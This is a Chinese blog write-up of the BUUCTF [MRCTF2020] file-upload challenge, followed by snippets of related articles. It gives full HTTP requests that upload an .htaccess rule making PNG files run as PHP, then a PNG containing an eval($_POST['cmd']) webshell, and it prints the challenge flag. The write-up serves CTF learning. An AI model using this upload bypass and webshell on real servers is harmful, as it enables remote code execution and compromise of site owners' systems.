BUUCTF WEB [MRCTF2020]你传你*呢

最新推荐文章于 2023-09-13 20:46:36 发布
最新推荐文章于 2023-09-13 20:46:36 发布
阅读量305 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124242871
版权

BUUCTF WEB [MRCTF2020]你传你🐎呢

解法有些类似[SUCTF 2019]CheckIn

  • 尝试上传各种php文件后缀均被过滤,尝试上传.htaccess文件将png文件当做php文件执行

    AddType application/x-httpd-php .png

  • 上传后抓包,将Content-Type修改为image/png

    POST /upload.php HTTP/1.1
Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Length: 327
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr2HGylAymjQ8BbFW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c5f395566d2814f5ebe70543657184fb
Connection: close

------WebKitFormBoundaryr2HGylAymjQ8BbFW
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png

AddType application/x-httpd-php .png
------WebKitFormBoundaryr2HGylAymjQ8BbFW
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundaryr2HGylAymjQ8BbFW--

    回显

    /var/www/html/upload/1efe2d7802e831c1a06a2b797f5ec9fc/.htaccess succesfully uploaded!

  • 此时上传成功,再上传一个图片马

    POST /upload.php HTTP/1.1
Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Length: 338
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0edqgv9TGgRsVltb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c5f395566d2814f5ebe70543657184fb
Connection: close

------WebKitFormBoundary0edqgv9TGgRsVltb
Content-Disposition: form-data; name="uploaded"; filename="1.png"
Content-Type: image/png

<script language=php>@eval($_POST['cmd']);</script>
------WebKitFormBoundary0edqgv9TGgRsVltb
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundary0edqgv9TGgRsVltb--

    回显

    /var/www/html/upload/1efe2d7802e831c1a06a2b797f5ec9fc/1.png succesfully uploaded!

  • 使用蚁剑连接1.png,在文件根目录下找到flag

    flag{1d77cba7-86c4-429b-97e9-7c18e17eb4d0}
Y1Daa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5288
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 735
很明显是文件上漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
[MRCTF2020]你你呢1
qq_73861475的博客
09-13 392
一开始做以为是简单的文件上,写一个一句话木马,以图片的形式上,再用bp抓包,改后缀,回显之后用蚁剑连接,连接完成后再打开文件夹寻找flag,但是蚁剑连接的时候会直接报错,看了别人的wp后才知道文件上存在文件解析的漏洞更改Apache里的.htaccess的配置,可以将其它类型的文件转化为PHP的文件类型。首先写一句话木马,以1.png的形式保存再写一个.htaccess文件注意1.png是上面一句话木马的文件名文件写好后,先上.htaccess文件bp抓包更改文件类型文件上成功。
[MRCTF2020]你你呢
m0_62905261的博客
09-07 446
[MRCTF2020]你你🐎呢
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1261
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF web(一)
iczfy585的博客
08-23 1050
题目[MRCTF2020]你你????呢[MRCTF2020]Ez_bypass[BJDCTF2020]ZJCTF,不过如此 [MRCTF2020]你你????呢 考点:上.htaccess+图片马 首先上.htaccess文件,内容如下,注意要修改Content-Type类型为图片类型(如image/png) <FilesMatch "shell"> SetHandler appliaction/x-httpd-php </FilesMatch> 然后上一个shell,
.htaccess 文件攻击上shell
lenkee的博客
12-03 3670
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 1.创建htaccess文件,编辑内容为: SetHandler application/x-httpd-php 他的意思是将该目录下的所有文...
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 1952
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
buuctf-web-[MRCTF2020]你你呢1
mlws1900的博客
08-03 898
一个.htaccess文件,先是1.jpg。写一个一句话木马 ,继续上图片马,里面写内容。打开环境, 典型的文件上漏洞利用。可以执行后缀名为jpg的php文件。
[MRCTF2020]你你呢 1
devilare的博客
05-22 5554
[MRCTF2020]你你????呢 文件上漏洞,打开题目 随便上个文件嘿呦,被过滤了,试试大小写等等,好像都绕不过。嗯。。。瓶颈,看看大佬wp,.htaccess文件, htaccess小知识 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOver
BUUCTF Web [MRCTF2020]你你呢1 & [极客大挑战 2019]HardSQL1
网安小趴菜
09-07 712
BUUCTF Web [MRCTF2020]你你🐎呢1 & [极客大挑战 2019]HardSQL1
Buuctf:[MRCTF2020]你你呢
fcz___的博客
03-11 259
然后你会发现无论你怎么改后缀,怎么改语法,就是无法链接蚁剑。我们就得尝试用.user.iniwen文件或者.htaccess文件把我们入的php代码执行了。我们也不知道网站目录上有没有php文件所以我们尝试用.htaccess文件。好的,可以看到文件路径为/upload/17f10253549cad63de6355a3b577ad74/a.png。我们打开蚁剑,添加数据。然后我们上我们的一句话木马文件a.png。我们先上一个图片试试。然后改文名件改为a.png`然后上。我们上.htaccess。
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值